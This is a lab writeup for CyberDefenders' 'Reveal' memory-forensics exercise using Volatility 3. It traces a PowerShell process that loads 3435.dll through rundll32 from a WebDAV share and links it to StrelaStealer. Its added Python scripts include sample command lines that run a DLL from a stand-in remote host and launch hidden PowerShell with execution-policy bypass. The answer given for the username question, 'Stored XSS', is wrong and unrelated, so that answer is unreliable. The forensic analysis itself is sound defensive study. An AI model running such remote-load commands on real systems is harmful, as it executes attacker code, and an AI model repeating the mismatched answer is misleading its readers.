
Reveal writeup using volatility3 - cyberdefenders

Instructions: Uncompress the lab (pass: cyberdefenders.org)

Scenario: As a cybersecurity analyst for a leading financial institution, an alert from your SIEM solution has flagged unusual activity on an internal workstation. Given the sensitive financial data at risk, immediate action is required to prevent potential breaches.

Your task is to delve into the provided memory dump from the compromised system. You need to identify basic Indicators of Compromise (IOCs) and determine the extent of the intrusion. Investigate the malicious commands or files executed in the environment, and report your findings in detail to aid in remediation and enhance future defenses.

Tools: Volatility 3

Question 1/7 - Identifying the name of the malicious process helps in understanding the nature of the attack. What is the name of the malicious process?

As usual, we first have to find the malicious process. We can use the windows.malfind plugin to look for injected or otherwise suspicious memory regions. It flags two suspicious processes:

  • smartscreen.exe
  • powershell.exe

After looking at the pstree output, smartscreen.exe looks legitimate, while powershell.exe does not.

smartscreen.exe: [screenshot of the malfind output]
powershell.exe: [screenshot of the malfind output]

It looks like a malicious command is being executed through PowerShell.

Answer - powershell.exe

Question 2/7 - Knowing the parent process ID (PPID) of the malicious process aids in tracing the process hierarchy and understanding the attack flow. What is the parent PID of the malicious process?

We can use windows.pstree plugin to find the parent process id of malicious process.


Answer - 4120

Question 3/7 - Determining the file name used by the malware for executing the second-stage payload is crucial for identifying subsequent malicious activities. What is the file name that the malware uses to execute the second-stage payload?

The windows.pstree plugin also reveals which file the malware executes: the child of the PowerShell process runs it.


Answer - 3435.dll

Question 4/7 - Identifying the shared directory on the remote server helps trace the resources targeted by the attacker. What is the name of the shared directory being accessed on the remote server?

The windows.pstree plugin also reveals the remote directory where the malicious file is stored and from which the attacker loads it.


Answer - davwwwroot

Question 5/7 - What is the MITRE sub-technique ID used by the malware to execute the second-stage payload?

After searching the MITRE ATT&CK techniques for rundll32 (a Windows utility that executes functions exported from a DLL), I got the sub-technique:


Answer - T1218.011
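The process-tree reasoning behind questions 1 to 5 can be automated. The script below is an added example, not part of the original writeup or of Volatility 3: it parses a constructed, simplified table that combines the fields of windows.pstree (PID, PPID, image) and windows.cmdline (command line), walks the tree upward from each rundll32.exe, and flags any instance that loads a DLL from a UNC/WebDAV path. The PIDs, the 192.0.2.10@8080 host and the export name "entry" are made up; only the process names, the DLL name and the share name follow the writeup.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample rows (tab-separated: PID, PPID, image, command line).
# They imitate the combined fields of Volatility 3's windows.pstree and
# windows.cmdline output; PIDs, host and export name are invented.
SAMPLE_ROWS = """\
4120\t612\texplorer.exe\tC:\\Windows\\Explorer.EXE
5000\t4120\tpowershell.exe\tpowershell.exe -w hidden -ep bypass -c "..."
5100\t5000\trundll32.exe\trundll32.exe \\\\192.0.2.10@8080\\davwwwroot\\3435.dll,entry
5200\t612\tsmartscreen.exe\tC:\\Windows\\System32\\smartscreen.exe -Embedding
"""

# \\host\share\[dir\...]file.dll  (host may carry a @port WebDAV suffix)
UNC_DLL_RE = re.compile(
    r"\\\\(?P<host>[^\\]+)\\(?P<share>[^\\]+)\\(?:[^\\\s,]+\\)*(?P<file>[^\\\s,]+\.dll)",
    re.IGNORECASE,
)


def parse_rows(text: str) -> List[Dict[str, object]]:
    """Turn the tab-separated table into a list of process dicts."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, ppid, image, cmdline = line.split("\t", 3)
        rows.append({"pid": int(pid), "ppid": int(ppid), "image": image, "cmdline": cmdline})
    return rows


def parent_pid(rows: List[Dict[str, object]], image: str) -> Optional[int]:
    """PPID of the first process whose image name matches (question 2)."""
    for r in rows:
        if str(r["image"]).lower() == image.lower():
            return int(r["ppid"])
    return None


def ancestry(rows: List[Dict[str, object]], pid: int) -> List[str]:
    """Image names from the given process up to the root that is present in the table."""
    by_pid = {int(r["pid"]): r for r in rows}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(str(by_pid[pid]["image"]))
        pid = int(by_pid[pid]["ppid"])
    return chain


def remote_dll_load(cmdline: str) -> Optional[Tuple[str, str, str]]:
    """Return (host, share, dll) when a command line loads a DLL over UNC/WebDAV."""
    m = UNC_DLL_RE.search(cmdline)
    return (m.group("host"), m.group("share"), m.group("file")) if m else None


def find_findings(rows: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Flag rundll32.exe proxy-executing a DLL from a remote share (ATT&CK T1218.011)."""
    findings = []
    for r in rows:
        if str(r["image"]).lower() != "rundll32.exe":
            continue
        hit = remote_dll_load(str(r["cmdline"]))
        if hit is None:
            continue
        host, share, dll = hit
        findings.append({
            "pid": r["pid"], "host": host, "share": share, "dll": dll,
            "chain": " <- ".join(ancestry(rows, int(r["pid"]))),
            "technique": "T1218.011",
        })
    return findings


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    print("powershell.exe PPID:", parent_pid(rows, "powershell.exe"))
    for f in find_findings(rows):
        print(f"[{f['technique']}] pid={f['pid']} {f['dll']} from \\\\{f['host']}\\{f['share']} ({f['chain']})")
```

On real output, replace SAMPLE_ROWS with the joined columns of the two plugins; the parent-chain string makes it obvious when rundll32 was launched from a script interpreter rather than from a normal installer or shell.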

Question 6/7 - Identifying the username under which the malicious process runs helps in assessing the compromised account and its potential impact. What is the username that the malicious process runs under?

To find the user responsible for running the process, we can use the UserAssist registry values. Volatility 3's userassist plugin (windows.registry.userassist) parses and interprets the UserAssist registry keys found in the memory dump.

Since Windows creates a directory for each user under C:\Users\USERNAME, we can use the following command to list all possible usernames:

```bash
python3 /home/kali/tools/volatility3/vol.py -f 192-Reveal.dmp userassist | grep -i "users"
```

Output: [screenshot of the command output]
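Grepping for "users" shows which NTUSER.DAT hives are present, but it does not by itself tie a program to a user. The script below is an added example, not part of the writeup or of Volatility 3: it parses constructed, simplified rows in the spirit of the userassist plugin's output (hive file path, decoded program name, run count), derives the username from the C:\Users\<name> part of the hive path, and lists the users whose UserAssist entries contain a given program. The users alice and bob and the counts are invented.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set

# Constructed rows (tab-separated: hive path, program, run count) imitating
# the windows.registry.userassist columns that matter here. Invented users.
SAMPLE_USERASSIST = """\
\\??\\C:\\Users\\alice\\ntuser.dat\t%windir%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\t3
\\??\\C:\\Users\\alice\\ntuser.dat\tC:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE\t12
\\??\\C:\\Users\\bob\\ntuser.dat\t%windir%\\system32\\notepad.exe\t1
"""

# The account name is the path component right after "Users".
USER_DIR_RE = re.compile(r"[\\/]Users[\\/]([^\\/]+)", re.IGNORECASE)


def username_from_path(path: str) -> Optional[str]:
    """Extract the profile name from a path such as \\??\\C:\\Users\\alice\\ntuser.dat."""
    m = USER_DIR_RE.search(path)
    return m.group(1) if m else None


def parse_userassist(text: str) -> List[Dict[str, object]]:
    """Split the tab-separated rows into dicts."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        hive, program, count = line.split("\t")
        rows.append({"hive": hive, "program": program, "count": int(count)})
    return rows


def programs_by_user(rows: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Group executed programs by the user whose hive recorded them."""
    grouped: Dict[str, List[str]] = defaultdict(list)
    for r in rows:
        user = username_from_path(str(r["hive"]))
        if user:
            grouped[user].append(str(r["program"]))
    return dict(grouped)


def users_who_ran(rows: List[Dict[str, object]], image: str) -> Set[str]:
    """Users with a UserAssist entry whose program path ends in the given image name."""
    suffix = "\\" + image.lower()
    return {
        user for user, programs in programs_by_user(rows).items()
        if any(p.lower().endswith(suffix) for p in programs)
    }


if __name__ == "__main__":
    rows = parse_userassist(SAMPLE_USERASSIST)
    print("users:", sorted(programs_by_user(rows)))
    print("ran powershell.exe:", sorted(users_who_ran(rows, "powershell.exe")))
```

UserAssist only records GUI-launched programs, so treat a hit as corroboration; the SID owning the hive and the process token reported by other plugins should agree with it before naming the compromised account.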

Answer - Stored XSS

Question 7/7 - Knowing the name of the malware family is essential for correlating the attack with known threats and developing appropriate defenses. What is the name of the malware family?

After doing some research on the malicious file 3435.dll, I found the malware family:

Answer - StrelaStealer